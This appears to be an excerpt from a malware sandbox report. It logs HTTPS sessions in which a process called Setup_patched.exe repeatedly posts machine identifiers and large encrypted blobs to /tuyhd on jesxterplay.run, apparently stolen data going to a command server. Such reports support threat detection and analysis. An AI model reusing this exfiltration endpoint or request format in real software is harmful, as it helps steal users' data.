                                                                                2025-04-13 15:05:19 UTC14896OUTData Raw: 2d 2d 31 6a 35 32 33 47 62 62 51 4b 35 49 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 0d 0a 2d 2d 31 6a 35 32 33 47 62 62 51 4b 35 49 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 6a 35 32 33 47 62 62 51 4b 35 49 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 30 42 31 37 45 33 43 38 35 38 42 43 37 42 38 44 30 37
                                                                                Data Ascii: --1j523GbbQK5IvContent-Disposition: form-data; name="uid"c543fd9fe0022f49bec7c3fa2ca8ec77934d0306--1j523GbbQK5IvContent-Disposition: form-data; name="pid"2--1j523GbbQK5IvContent-Disposition: form-data; name="hwid"7B0B17E3C858BC7B8D07
                                                                                2025-04-13 15:05:20 UTC816INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:20 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WnqKoDp5TmlFeNEPD%2FjKwbvCnH0rw10H1Cof3%2BO49%2F6D%2Feb%2FGyeDs2OTjnaHdFHM4iJTDdpp06ms9pmgo5mako7EEBC98yxrUZz5qybcI8dNxePZv0lihpHk%2FxUERoo1tc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdc6bfae232f5-JAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=113172&min_rtt=112929&rtt_var=24070&sent=14&recv=19&lost=0&retrans=0&sent_bytes=3049&recv_bytes=15832&delivery_rate=35753&cwnd=252&unsent_bytes=0&cid=f7cb863fd91785df&ts=714&x=0"
                                                                                2025-04-13 15:05:20 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                2025-04-13 15:05:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549697104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:21 UTC276OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=fOrMK1j22vG
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 15035
                                                                                Host: jesxterplay.run
                                                                                2025-04-13 15:05:21 UTC15035OUTData Raw: 2d 2d 66 4f 72 4d 4b 31 6a 32 32 76 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 0d 0a 2d 2d 66 4f 72 4d 4b 31 6a 32 32 76 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 66 4f 72 4d 4b 31 6a 32 32 76 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 30 42 31 37 45 33 43 38 35 38 42 43 37 42 38 44 30 37 46 44 44 32 45 31
                                                                                Data Ascii: --fOrMK1j22vGContent-Disposition: form-data; name="uid"c543fd9fe0022f49bec7c3fa2ca8ec77934d0306--fOrMK1j22vGContent-Disposition: form-data; name="pid"2--fOrMK1j22vGContent-Disposition: form-data; name="hwid"7B0B17E3C858BC7B8D07FDD2E1
                                                                                2025-04-13 15:05:22 UTC812INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:22 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z1d1R0BZzSBT5jWBLyaRVluwQ3prS%2FakUiqPzEkUTveG3%2Be6ETE3QQMyOWvac364O2tvxCT%2F0ajr5Wuis%2BZIyqjOfTVRBmxZ4adt9GYYPxSSaR34s3vbVV8bU5XkyO38iek%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdc7709609ae2-JAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=113447&min_rtt=112932&rtt_var=24360&sent=11&recv=19&lost=0&retrans=0&sent_bytes=3049&recv_bytes=15969&delivery_rate=35753&cwnd=252&unsent_bytes=0&cid=36dd1e4e4c845c75&ts=498&x=0"
                                                                                2025-04-13 15:05:22 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                2025-04-13 15:05:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549698104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:24 UTC283OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=bhOx66UKCjW2db53jj
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 20559
                                                                                Host: jesxterplay.run
                                                                                2025-04-13 15:05:24 UTC15331OUTData Raw: 2d 2d 62 68 4f 78 36 36 55 4b 43 6a 57 32 64 62 35 33 6a 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 0d 0a 2d 2d 62 68 4f 78 36 36 55 4b 43 6a 57 32 64 62 35 33 6a 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 68 4f 78 36 36 55 4b 43 6a 57 32 64 62 35 33 6a 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 30 42 31
                                                                                Data Ascii: --bhOx66UKCjW2db53jjContent-Disposition: form-data; name="uid"c543fd9fe0022f49bec7c3fa2ca8ec77934d0306--bhOx66UKCjW2db53jjContent-Disposition: form-data; name="pid"3--bhOx66UKCjW2db53jjContent-Disposition: form-data; name="hwid"7B0B1
                                                                                2025-04-13 15:05:24 UTC5228OUTData Raw: 72 54 d5 ec e5 12 4d e3 4d da 0f 86 17 0a 62 99 55 39 4b 3f e0 aa 04 b0 f1 cc f4 e5 16 7e 1e ba 2a aa e9 e9 8a 22 1d 58 a0 96 1d 76 81 41 f5 92 65 87 ce 6d cc 39 73 d4 f4 bb 1b 2d 35 37 3b 48 de f0 1f 73 41 04 f4 47 a1 4e 6f ad 26 a9 16 2f af b8 01 98 c1 b0 5e d1 d6 6f 2b 17 f6 ab 2e bc ce a4 03 60 fb 11 6e fb 7c 2b 5a 43 59 5f 69 13 47 a7 2c 06 15 18 79 36 e3 b5 15 74 01 0d f5 79 33 95 f0 b8 f1 72 e3 d4 d2 e1 1b ec ad 34 cf f3 2a fe 75 c2 9a b5 28 c0 84 c5 3f da b6 e7 e9 11 b6 c6 ed 3c b8 ae 3d 6f d7 8d 26 d7 ca aa ec 71 f6 0d dc e5 f2 36 19 ee 95 36 eb d0 3a bf 13 7e 2c ff 47 b7 2e a9 38 25 e2 da 48 79 ed 81 16 d7 0a 48 58 1f 2f 3f 7b 16 da 0e 0e 41 3c 67 5e 8c d3 c0 55 45 14 0e bb 6b eb 9b 53 e7 23 3d ee d2 e1 09 c9 16 a0 3b bd 97 af a6 28 e7 04 e0 17
                                                                                Data Ascii: rTMMbU9K?~*"XvAem9s-57;HsAGNo&/^o+.`n|+ZCY_iG,y6ty3r4*u(?<=o&q66:~,G.8%HyHX/?{A<g^UEkS#=;(
                                                                                2025-04-13 15:05:24 UTC808INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:24 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L6l5Hyitmx9ntXo3GSlCP76lCV7ZG3c3Qggt0iiFiJhZ10sgXylov4kR63u5NWeB%2FrP1E7j3%2FhkxmLYGu69wLyPzUkJ9L4bc1C6US4OGF6Z1T0Y1s1qUNVUSSoY4IivOflI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdc85bbf99ae2-JAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=114771&min_rtt=112796&rtt_var=25871&sent=13&recv=23&lost=0&retrans=0&sent_bytes=3049&recv_bytes=21522&delivery_rate=35795&cwnd=252&unsent_bytes=0&cid=98391c7bd90a0cb2&ts=523&x=0"
                                                                                2025-04-13 15:05:24 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                2025-04-13 15:05:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549699104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:28 UTC281OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=j1UMtlvtEYW57USv6
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 7115
                                                                                Host: jesxterplay.run
                                                                                2025-04-13 15:05:28 UTC7115OUTData Raw: 2d 2d 6a 31 55 4d 74 6c 76 74 45 59 57 35 37 55 53 76 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 0d 0a 2d 2d 6a 31 55 4d 74 6c 76 74 45 59 57 35 37 55 53 76 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 6a 31 55 4d 74 6c 76 74 45 59 57 35 37 55 53 76 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 30 42 31 37 45 33
                                                                                Data Ascii: --j1UMtlvtEYW57USv6Content-Disposition: form-data; name="uid"c543fd9fe0022f49bec7c3fa2ca8ec77934d0306--j1UMtlvtEYW57USv6Content-Disposition: form-data; name="pid"1--j1UMtlvtEYW57USv6Content-Disposition: form-data; name="hwid"7B0B17E3
                                                                                2025-04-13 15:05:29 UTC806INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:29 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fwPJ7vHypfcp3wtWfr6XKpkRIEd3nCpZbLfNc9bqqXC8tk2YRe%2ByIg8FGhI73eCuIQNiMXW5iMDW2eOGDL%2Bny1TVfj5VSCxHPbFtbsRFq1r0CGfhnpj2SStKd56Gjg2BT1U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdca22c5468cc-JAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=114663&min_rtt=113370&rtt_var=25270&sent=7&recv=13&lost=0&retrans=0&sent_bytes=3049&recv_bytes=8032&delivery_rate=35612&cwnd=252&unsent_bytes=0&cid=15e57d51c951fbb1&ts=597&x=0"
                                                                                2025-04-13 15:05:29 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                2025-04-13 15:05:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.549700104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:29 UTC272OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=83O86pv2
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 2548
                                                                                Host: jesxterplay.run
                                                                                2025-04-13 15:05:29 UTC2548OUTData Raw: 2d 2d 38 33 4f 38 36 70 76 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 0d 0a 2d 2d 38 33 4f 38 36 70 76 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 33 4f 38 36 70 76 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 30 42 31 37 45 33 43 38 35 38 42 43 37 42 38 44 30 37 46 44 44 32 45 31 32 34 43 32 33 34 0d 0a 2d
                                                                                Data Ascii: --83O86pv2Content-Disposition: form-data; name="uid"c543fd9fe0022f49bec7c3fa2ca8ec77934d0306--83O86pv2Content-Disposition: form-data; name="pid"1--83O86pv2Content-Disposition: form-data; name="hwid"7B0B17E3C858BC7B8D07FDD2E124C234-
                                                                                2025-04-13 15:05:30 UTC812INHTTP/1.1 200 OK
                                                                                Date: Sun, 13 Apr 2025 15:05:30 GMT
                                                                                Content-Type: application/json
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZroEjUVgA%2BBu3IWwFXlF80DDVlW5WZ2WWEq3Hl%2BdzA%2B4pJmV15BnjBGKljotlKK%2Fhwlo42yIXvXV0UrrS9K5RbL5qaNpjgZrToamybpsyRVCfeZih%2B2Nf4c8703WiR9SKM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 92fbdcaaac793d59-JAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=113134&min_rtt=112741&rtt_var=24373&sent=7&recv=10&lost=0&retrans=0&sent_bytes=3049&recv_bytes=3456&delivery_rate=35440&cwnd=252&unsent_bytes=0&cid=49a91124d80616a7&ts=605&x=0"
                                                                                2025-04-13 15:05:30 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                2025-04-13 15:05:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.549701104.21.80.14437836C:\Users\user\Desktop\Setup_patched.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-04-13 15:05:31 UTC282OUTPOST /tuyhd HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=Mj244OSjh0hAEb6C
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                Content-Length: 589388
                                                                                Host: jesxterplay.run
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: 2d 2d 4d 6a 32 34 34 4f 53 6a 68 30 68 41 45 62 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 35 34 33 66 64 39 66 65 30 30 32 32 66 34 39 62 65 63 37 63 33 66 61 32 63 61 38 65 63 37 37 39 33 34 64 30 33 30 36 0d 0a 2d 2d 4d 6a 32 34 34 4f 53 6a 68 30 68 41 45 62 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 6a 32 34 34 4f 53 6a 68 30 68 41 45 62 36 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 30 42 31 37 45 33 43 38 35
                                                                                Data Ascii: --Mj244OSjh0hAEb6CContent-Disposition: form-data; name="uid"c543fd9fe0022f49bec7c3fa2ca8ec77934d0306--Mj244OSjh0hAEb6CContent-Disposition: form-data; name="pid"1--Mj244OSjh0hAEb6CContent-Disposition: form-data; name="hwid"7B0B17E3C85
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: ee 7e fa 32 84 d8 84 c9 ed 81 42 85 08 33 79 e9 a6 d8 df 1e ae 6b f0 3b bb 8b da ad 9f fd 89 d6 1a 94 73 77 f2 2e 2e 04 ab 49 57 b5 cf 0e 47 f4 c1 c3 7f fd 0d 19 44 ce a1 78 ab 3d 54 0c 89 f8 ef d8 dc 5e 7a 80 30 20 2a fd 72 ed 48 8c f1 96 f8 88 d1 86 47 99 ef ac 33 93 b5 9c f7 36 4c 19 41 04 23 3c 98 df 8e fc cf 65 e4 be 51 d6 40 70 bd 8d 18 78 f8 4c 23 5f f0 9f 24 71 67 66 59 63 8c 7d 15 29 1d 58 7c c0 0f 47 e6 0c 59 33 83 ae 12 11 2a 49 5d 26 0a 8b 8a d7 4b 42 23 27 37 d6 af 5a 37 d7 c9 e0 5b b3 1e ec 63 a2 b9 37 cd ca 7b b0 2a 88 86 bc 7c b9 e5 83 ea 4e b3 1c 45 40 bc d5 d6 01 ed 5e d3 e4 44 89 f9 4a aa 3f 71 f6 23 5d 85 ca 8c dc 80 48 37 db da 0d b0 45 c2 4d ee 5d 82 38 a5 4c d2 07 84 3a a1 f9 b4 95 b6 f6 6c b0 50 7f 74 a3 83 6e ec 25 04 34 2b e0 17
                                                                                Data Ascii: ~2B3yk;sw..IWGDx=T^z0 *rHG36LA#<eQ@pxL#_$qgfYc})X|GY3*I]&KB#'7Z7[c7{*|NE@^DJ?q#]H7EM]8L:lPtn%4+
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: e1 23 86 4a bc ca 10 26 d4 bb 04 27 00 e6 e2 3d 56 c2 52 2b 3e e4 b9 67 53 27 79 ac d2 cb 62 83 d9 75 44 29 76 6c 8d 2a 4a 36 01 3a a3 63 11 5c be a9 b0 76 a3 a7 ac dd c7 28 b4 2f f3 58 6a b3 9d c5 ca 5b e8 0b 86 8d 52 f7 72 b8 04 94 ed 49 26 31 01 01 8b b1 38 a5 7a 57 44 77 e1 f5 bb 85 cd cf fe 46 13 3f 06 0d de 6f 29 09 5d 82 af 48 a0 1c d1 b5 02 a5 e6 23 be 52 21 67 c4 39 a1 21 0f 16 07 55 0c 41 77 21 88 28 18 8b 0d 7f c8 cf 1b 29 0c 62 4b 12 1c b3 b1 65 a6 3d 91 28 94 3e 8e bb e0 d8 d1 55 57 59 9a f4 47 b5 b2 e9 d2 a8 b0 ee c4 a2 86 da f7 8a 9f 0e b2 df 37 64 c6 fd 33 af 28 04 f8 49 65 5a 30 a2 07 0f a1 18 8d fd 00 13 8c f2 74 6c 18 c6 14 5f 27 ce 4d 91 b0 d3 9d 8e 46 eb b0 ec bf c6 af 98 44 58 b7 c1 cb 7a f2 cb 8e 89 49 49 02 92 3c 73 57 6f 88 d1 cb
                                                                                Data Ascii: #J&'=VR+>gS'ybuD)vl*J6:c\v(/Xj[RrI&18zWDwF?o)]H#R!g9!UAw!()bKe=(>UWYG7d3(IeZ0tl_'MFDXzII<sWo
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: b7 d1 12 a6 37 cc 4d 40 fc c8 2f e0 cc 0f 84 e5 b4 b0 39 04 5e 05 c2 bc 17 93 41 95 b2 f0 4e 97 af ba 43 3a 01 f0 6f f2 d1 ef 4f fc 83 a0 1b 43 bc c1 b5 57 47 46 35 74 cc 58 94 ae bc 22 01 0e e7 8d 48 8b ee 9e b1 61 3e 92 4a 23 e1 36 12 11 1c 81 6c b8 26 54 6b 6c 8a 28 80 15 db 4c 16 c3 06 dc 07 04 8f 0f 0b 5e 45 67 4d 05 e2 e8 90 cf d1 79 48 12 8a 91 80 95 fb 39 f9 67 dd de b5 30 46 3f 66 4d f9 9d 98 6d 18 51 9d 6a e2 05 38 a9 7f c3 53 46 4d 04 31 d6 52 77 9f 9f af df f6 70 d1 c0 c1 04 f9 33 7f 07 e2 13 cd d8 19 09 3a 09 15 dd 65 29 e4 dc d8 b9 ff 13 e3 e4 e1 ea d2 6d 37 05 d0 12 66 c2 6c ab 5d 21 24 a0 d0 8d c7 d6 82 7f 26 3c 6e 50 c0 55 74 55 92 e5 49 56 be b1 33 f9 11 0b 76 2a e7 34 4a f3 b5 0c b9 19 5b 00 fe de bc 1a 32 ce 94 dd 35 4f 0a 1c f4 3e 51
                                                                                Data Ascii: 7M@/9^ANC:oOCWGF5tX"Ha>J#6l&Tkl(L^EgMyH9g0F?fMmQj8SFM1Rwp3:e)m7fl]!$&<nPUtUIV3v*4J[25O>Q
                                                                                2025-04-13 15:05:31 UTC15331OUTData Raw: 01 b9 e2 73 db ba 58 cf 8d 60 7a 26 d1 60 d1 48 89 82 79 f9 27 d3 30 51 7e d6 70 67 08 9d 7e c8 95 f7 d8 d2 86 cf 6c 7a fe 0e d1 eb d6 6a 70 9a b1 8c dc c7 f4 93 0d 67 c9 69 58 50 c8 0e 12 2b c3 d9 67 2c 27 c9 c9 14 39 29 a1 d6 a2 8d dd fe ef 4b 51 1b 8c b3 1e ea 9e f7 b2 98 01 56 70 8c d9 d8 f3 93 6c a0 f5 93 b4 a1 dd 26 b8 98 15 7a 9b 28 7f 8d 00 16 9c a2 29 34 17 d5 a0 ca 3c 2a 1d c5 7f cd 90 99 3d fc b9 ff 25 79 94 56 be 7a c7 3a b8 97 a2 97 49 36 1f 1c 49 c1 9a 41 80 82 71 11 88 11 2a cc 8b 8a 17 b9 6e cd f1 19 72 dd 91 a6 a8 67 04 e4 3e de 6c 51 aa c7 cf c6 63 ad 29 8b b0 17 bf 93 29 fa 14 c9 e7 c2 b3 0c d8 a6 64 ba ca 67 b9 83 e1 48 8a 81 c2 f2 aa 82 44 63 8c ba e5 82 0e ba e0 9a 0a 18 5c a4 9b 04 00 eb 95 01 1c 93 55 73 1e 54 3c 15 2f 83 f1 84 7d
                                                                                Data Ascii: sX`z&`Hy'0Q~pg~lzjpgiXP+g,'9)KQVpl&z()4<*=%yVz:I6IAq*nrg>lQc))dgHDc\UsT</}
